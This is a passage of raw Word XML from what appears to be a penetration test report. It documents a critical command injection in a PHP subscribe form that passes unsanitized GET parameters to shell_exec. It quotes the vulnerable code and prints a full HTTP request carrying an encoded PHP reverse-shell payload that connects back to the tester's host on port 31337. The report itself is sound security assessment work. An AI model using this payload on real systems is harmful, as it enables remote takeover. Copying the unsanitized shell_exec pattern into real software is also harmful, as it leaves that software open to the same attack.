            </w:pPr>
            <w:r>
              <w:t>Stopped: Sun Apr 30 10:51:59 2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41F7D531" w14:textId="4C3B9938" w:rsidR="00343A40" w:rsidRDefault="00343A40" w:rsidP="00343A40">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391754CE" w14:textId="252792C5" w:rsidR="00646037" w:rsidRDefault="00646037">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7B2760" w14:textId="77777777" w:rsidR="00646037" w:rsidRPr="00646037" w:rsidRDefault="00646037" w:rsidP="00646037"/>
    <w:p w14:paraId="1FB3E752" w14:textId="77777777" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc129370249"/>
      <w:r>
        <w:t>Findings Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A56689" w14:textId="77777777" w:rsidR="00646037" w:rsidRPr="00542A1D" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00542A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Critical Risk Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E80BB" w14:textId="40071370" w:rsidR="00646037" w:rsidRPr="001215EC" w:rsidRDefault="00DA733E" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001215EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A560F6A" w14:textId="029A5710" w:rsidR="00646037" w:rsidRPr="006F5E52" w:rsidRDefault="00646037" w:rsidP="00646037">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DA733E" w:rsidRPr="005264D0" w14:paraId="799D81CF" w14:textId="77777777" w:rsidTr="000F477A">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7B298D1" w14:textId="6743EBB2" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA733E" w:rsidRPr="005264D0" w14:paraId="4149CF9C" w14:textId="77777777" w:rsidTr="003C17E2">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7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="2A89D404" w14:textId="4DA8C90C" w:rsidR="00DA733E" w:rsidRPr="00DA733E" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Critical Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="07C455B7" w14:textId="0D4B7292" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="04977400" w14:textId="6360EA1E" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA733E" w:rsidRPr="005264D0" w14:paraId="4436DBB1" w14:textId="77777777" w:rsidTr="003C17E2">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7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="47AE6292" w14:textId="76558416" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6748E604" w14:textId="27D58FFB" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08085F26" w14:textId="1C41BA5F" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="118E6A3B" w14:textId="6EAC2DBC" w:rsidR="00343A40" w:rsidRPr="00DA733E" w:rsidRDefault="00646037" w:rsidP="007B579A">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="00DA733E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A40" w:rsidRPr="00343A40">
        <w:t>OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server running an application and typically fully compromise the application and all its data. An attacker can often leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D08977" w14:textId="77A76EF0" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DA733E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E948598" w14:textId="19450684" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>http://10.10.0.66/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB4B3AC" w14:textId="5E173CE9" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="00DA733E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4CC8F" w14:textId="02203939" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="00DA733E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ema</w:t>
      </w:r>
      <w:r w:rsidR="001215EC" w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>il</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001215EC" w:rsidRPr="003C17E2">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02AFD9" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C6F4A0" w14:textId="049287B6" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>http://10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>:8001</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902AF73" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711D62B" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F40DED" w14:textId="77777777" w:rsidR="001215EC" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58832ACD" w14:textId="1D44DCDE" w:rsidR="00646037" w:rsidRPr="006F5E52" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370FF0A" w14:textId="3119635D" w:rsidR="001215EC" w:rsidRDefault="006F5E52" w:rsidP="001215EC">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="003C17E2">
        <w:t>“Subscribe Now” box in the web application allows users to enter their name and email address to sign up for the NBN network, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7603B6" w14:textId="5649F38D" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3975CAEA" wp14:editId="157C4EA5">
            <wp:extent cx="4533900" cy="2428072"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="98972807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8070" name="Picture 1" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18"/>
                    <a:srcRect r="3044" b="4443"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4541888" cy="24323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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subscribe Now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798EC0E" w14:textId="39967FE7" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After the user inputs their name and email address, the application writes it to the customer list file by using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function, shown in the following line of code:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C17E2" w14:paraId="04CCEB25" w14:textId="77777777" w:rsidTr="003C17E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDF8C0" w14:textId="5F8FD78F" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shell_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>( "</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>echo '" . $_GET['email'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " : " . $_GET['name'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " //// ' &gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;  /var/www/html/data/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customer.list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D8333EC" w14:textId="5FD5F9B6" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Write Email and Name </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8A248" w14:textId="6380672E" w:rsidR="00DA7649" w:rsidRPr="00AC67FD" w:rsidRDefault="003C17E2" w:rsidP="00AC67FD">
      <w:r>
        <w:t xml:space="preserve">Because the function places the user inputs into the string to be executed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function without sanitization, an attacker can use specially crafted input to escape the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command and execute arbitrary commands on the server</w:t>
      </w:r>
      <w:r w:rsidR="00DA7649">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve">The Hyperthetical team was able to use this vulnerability to get a reverse shell on </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve"> in the context of the </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve"> user. The below request contains an encoded PHP reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidR="00F66181">
        <w:t xml:space="preserve"> that caused the server to connect back to the assessment team’s jump host.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA7649" w14:paraId="04495541" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2274CF2B" w14:textId="7FF9A82A" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00033EC8" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /?name=test&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>email=test'%20%26%20php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.0.10%22%2C31337%29%3B%60%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%60%3B%27%3b%29%23</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763C576B" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F2A9EC" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6D7491" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cookie: authenticated=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C42842" w14:textId="751D8A22" w:rsidR="00DA7649" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11760C7E" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5967A" w14:textId="18537EDE" w:rsidR="00F66181" w:rsidRPr="00F66181" w:rsidRDefault="00F66181" w:rsidP="00AC67FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
